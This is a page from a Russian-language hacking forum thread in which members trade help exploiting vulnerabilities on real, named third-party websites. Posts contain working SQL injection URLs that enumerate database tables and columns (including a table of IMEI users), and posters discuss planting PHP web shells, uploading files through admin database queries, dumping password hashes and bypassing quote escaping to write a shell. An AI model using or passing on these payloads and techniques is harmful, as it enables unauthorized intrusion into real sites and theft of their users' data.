Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Napas
    создавай .php файл:
    выполняй его, и shell.php будет твой шелл ;)
     
    #4361 aka PSIH, 30 Dec 2008
    Last edited: 30 Dec 2008
    2 people like this.
  2. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    7
    aka PSIH
    не катит (
    Warning: copy(D:/Web/cms/xek.php) [function.copy]: failed to open stream: Permission denied in D:\Web\cms\jj.php on line 2
    можно ли еще что-нибудь сделать в такой ситуации?
     
    #4362 Napas, 30 Dec 2008
    Last edited: 30 Dec 2008
    1 person likes this.
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    sabe
    Что вы так боитесь подзапросы, один раз разобраться, и всё станет понятно в дальнейшем
    Вот пример(точнее один из вариантов), всё просто
    Подбираем таблицу:
    Далее, вывод значения:
    Это незаконченный вывод
    Добивать не стал. кому нужно разберутся )

    Разумеется скриптами всё будет гораздо быстрее чем вручную
     
    1 person likes this.
  4. vladvk

    vladvk New Member

    Joined:
    22 Dec 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    В админки есть возможность делать запросы к базе
    Помогите составить правильно запрос чтобы закачать файл на сервер.
    Сори если не туда.
     
  5. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Нашел очередную скулю на сайте какогото импортного хостера:
    Подскажите, как раскрутить? И в чем там вообще проблема?
    :)
     
  6. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+in+'.'
    выдает: Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.
    кто дальше пробьется?
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А куда дальше-то? Обычная скуль, MSSQL, отлично крутится всё в порядке, никаких аномалий

    http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('tbl_comps','all_tovar','allprice','banner'))--

    и т.д
     
    1 person likes this.
  8. H.T.N

    H.T.N New Member

    Joined:
    11 Mar 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    я новичек.скажите как достать хеш и чем?
     
  9. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    http://mirinfo.ru/cat/zapas.aspx?num=1'


    скуля?
     
  10. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    откуда? o_O
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Руками.
     
  12. lexus5122

    lexus5122 New Member

    Joined:
    16 Mar 2007
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Да. Вроде бы )
     
  13. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    кто раскрутить помогет?
     
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Thrasher88
    фильтрирует...

    F4R
    заабей... )

    юниона нема? (
    иьект у мусаров?
     
    #4374 sabe, 30 Dec 2008
    Last edited: 30 Dec 2008
    2 people like this.
  15. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    почему ошибка?
     
  16. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Для начало - там 13 столбцов...

    Code:
    http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(table_name,0x3a,table_rows),4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
    To sabe:

    Code:
    http://www.hawkingtech.com/downloads.php?file_id=2340+and+substring(version(),1,1)=3
    3-я ветка..
     
    #4376 R1dex, 30 Dec 2008
    Last edited: 30 Dec 2008
    2 people like this.
  17. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    а как например вывести колонки из IMEI_users ???
     
  18. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Вот так.

    Code:
    http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x494d45495f7573657273--
     
    2 people like this.
  19. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Всех приветствую.
    Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
    Спасибо!
     
    1 person likes this.
  20. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Да, но даже при меджик квотс = он можно выкрутиться, вот смотри: https://forum.antichat.ru/showpost.php?p=663815&postcount=39

    Меня это спасало не один раз, да и имея возможность читать сорцы сайта, можно найти ещё какую-нидь уязвимость или туже "двойную скулю", но в другом скрипте.
     
    6 people like this.
Thread Status:
Not open for further replies.